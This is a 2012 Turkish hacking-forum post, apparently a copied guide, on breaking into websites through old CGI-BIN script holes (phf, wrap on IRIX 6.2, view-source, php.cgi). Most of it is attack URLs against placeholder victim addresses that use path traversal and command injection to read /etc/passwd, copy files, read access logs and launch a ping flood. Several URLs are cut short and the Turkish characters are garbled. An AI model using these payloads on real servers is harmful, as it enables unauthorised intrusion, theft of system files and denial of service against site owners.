İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Sıtelerı cgı/bın acıklarından yaralanıp kırmak

09-03-2012 00:51
#1
Sabotaqe9 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2010
Nereden:
Nereye
Mesajlar:
1.075
Teşekkür (Etti):
32
Teşekkür (Aldı):
170
Konular:
215
Ticaret:
(0) %
SITELERI CGI/BIN ACIKLARINDAN YARALANIP KIRMAK

a- (Phf scripti): Pek cok web ana bilgisayari CGI-BIN guvenli?inden

yoksundur. Bir de bunun uzerine sistem yöneticilerinin CGI-BIN guvenlik

aciklarini bilmemesi potansiyel sistem aciklarina yol acmaktadir. Tum

dunyada pek cok hacker'in kullandi?i cgi-bin guvenlik aci?i:

http://www.kiraca?imizadres.com.tr/c...%20/etc/passwd

Fakat bazi uyanik sistem yöneticileri phf komutunun kullanimini

sinirlamislardir. Bu yuzden bu komutu calistiramayabilirsiniz. Fakat yine

de alternatif web makinalari uzerinde denemekte yarar var.

b- (Wrap Scripti): Irix isletim sisteminin 6.2 versiyonunda rastlanan bu

hatayi da söyle istismar edebiliriz:

http://www.kiraca?imizadres.com.tr/c.../../etc/passwd

http://www.kiraca?imizadres.com.tr/cgi-bin/wrap?%0als (...)

Dikkat edece?imiz tek nokta bu hata sadece IRIX 6.2'de var. !!

c- (View Source Scripti): Denemek serbest (basariya ulasabilme

ihtimali kadar ulasamama ihtimali de var)

http://www.kiraca?imizadres.com.tr/c.../../etc/passwd

ya da

http://www.kiraca?imizadres.com.tr/c...iew-source?%1b or

%0a %20

d- (php.cgi Scripti):

http://www.victim.com/cgi-bin/php.cg.../../etc/passwd

e- Di?er Denenebilir Scriptler:

http://www.kiraca?imizadres.com.tr/c...-c%201000%20-s

%205000%20ip%20to%20shoot

http://www.kiraca?imizadres.com.tr/c...cp%20phf%20fhp

http://www.kiraca?imizadres.com.tr/c...%20phf%20.blah

http://www.kiraca?imizadres.com.tr/c...l%20/dir/to/go

http://www.kiraca?imizadres.com.tr/c...ww/dirtocreate

http://www.kiraca?imizadres.com.tr/c...ogs/access_log


Kullanıcı İmzası
[YOUTUBE]hHSwH4ow4lU&feature=related[/YOUTUBE]


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı